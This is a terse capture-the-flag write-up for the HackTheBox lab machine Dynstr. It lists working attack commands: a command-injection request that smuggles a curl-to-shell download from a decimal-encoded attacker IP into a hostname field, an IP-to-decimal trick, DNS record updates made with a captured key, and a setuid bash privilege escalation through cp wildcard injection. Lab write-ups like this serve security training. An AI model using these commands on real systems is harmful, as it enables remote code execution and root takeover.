Dynamic DNS & Command Injection - Dynstr @ HackTheBox
We are solving Dynstr, a 30-point Linux machine on HackTheBox that involves a Dynamic DNS Service & a Command Injection.
Notes
Command Injection
1
GET /nic/update?hostname=$(curl+168431223/x|sh).no-ip.htb&myip=10.10.14.119 HTTP/1.1
Convert IP to decimal:
1
struct.unpack("!L", socket.inet_aton("10.10.14.119"))[0]
DNS Updates
1
2
echo "local 127.0.0.1\nupdate add xct.infra.dyna.htb 30 IN A 10.10.14.119\nsend\n" | /usr/bin/nsupdate -k /etc/bind/infra.key
echo "server 127.0.0.1\nzone 10.in-addr.arpa\nupdate add 119.14.10.10.in-addr.arpa. 30 PTR xct.infra.dyna.htb\nsend\n" | /usr/bin/nsupdate -k /etc/bind/infra.key
Wildcard Injection in “cp”
1
2
3
cp /bin/bash .
chmod 4777 bash
touch -- --preserve=mode
This post is licensed under CC BY 4.0 by the author.